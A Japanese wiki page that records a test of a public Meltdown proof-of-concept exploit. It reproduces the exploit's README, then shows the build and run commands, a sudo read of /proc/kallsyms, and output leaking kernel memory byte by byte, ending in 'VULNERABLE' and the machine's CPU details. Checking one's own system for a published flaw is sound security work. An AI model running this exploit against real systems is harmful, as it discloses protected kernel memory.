Meltdown-Spectre/POC3 - moin.dnsq.info

Meltdown-Spectre/POC3について、ここに記述してください。

# MELTDOWN EXPLOIT POC

Speculative optimizations execute code in a non-secure manner leaving data
traces in microarchitecture such as cache.

Refer to the paper by Lipp et. al 2017 for details: https://meltdownattack.com/m
eltdown.pdf.

Can only dump `linux_proc_banner` at the moment, since requires accessed memory
to be in cache and `linux_proc_banner` is cached on every read from
`/proc/version`. Might work with `prefetch`.

Build with `make`, run with `./run.sh`.

Can't defeat KASLR yet, so you may need to enter your password to find
`linux_proc_banner` in the `/proc/kallsyms` (or do it manually).

Flush+Reload and target array approach taken from spectre paper https://spectrea
ttack.com/spectre.pdf
implemented following clues from https://cyber.wtf/2017/07/28/negative-result-re
ading-kernel-memory-from-user-mode/.

Pandora's box is open.

tmaeno@u16:~/Desktop/meltdown-exploit-master$ make
cc -O2 -msse2   -c -o meltdown.o meltdown.c
cc   meltdown.o   -o meltdown

tmaeno@u16:~/Desktop/meltdown-exploit-master$ ls
Makefile  meltdown  meltdown.c  meltdown.o  README.md  run.sh

tmaeno@u16:~/Desktop/meltdown-exploit-master$ ./run.sh
looking for linux_proc_banner in /proc/kallsyms
protected. requires root

+ find_linux_proc_banner /proc/kallsyms sudo
+ sudo sed -n -E s/^(f[0-9a-f]+) .* linux_proc_banner$/\1/p /proc/kallsyms
[sudo] password for tmaeno: 
+ linux_proc_banner=ffffffff81a00060
+ set +x
cached = 39, uncached = 228, threshold 94
read ffffffff81a00060 = 25 % (score=286/1000)
read ffffffff81a00061 = 73 s (score=285/1000)
read ffffffff81a00062 = 20   (score=403/1000)
read ffffffff81a00063 = 76 v (score=360/1000)
read ffffffff81a00064 = 65 e (score=654/1000)
read ffffffff81a00065 = 72 r (score=266/1000)
read ffffffff81a00066 = 73 s (score=458/1000)
read ffffffff81a00067 = 69 i (score=678/1000)
read ffffffff81a00068 = 6f o (score=379/1000)
read ffffffff81a00069 = 6e n (score=205/1000)
read ffffffff81a0006a = 20   (score=415/1000)
read ffffffff81a0006b = 25 % (score=385/1000)
read ffffffff81a0006c = 73 s (score=253/1000)
read ffffffff81a0006d = 20   (score=480/1000)
read ffffffff81a0006e = 28 ( (score=604/1000)
read ffffffff81a0006f = 62 b (score=336/1000)
VULNERABLE
PLEASE POST THIS TO https://github.com/paboldin/meltdown-exploit/issues/19
VULNERABLE ON
4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64
processor       : 0
vendor_id       : GenuineIntel
cpu family      : 6
model           : 42
model name      : Intel(R) Core(TM) i5-2400 CPU @ 3.10GHz
stepping        : 7
microcode       : 0x26
cpu MHz         : 3399.949
cache size      : 6144 KB
physical id     : 0

MoinQ: Meltdown-Spectre/POC3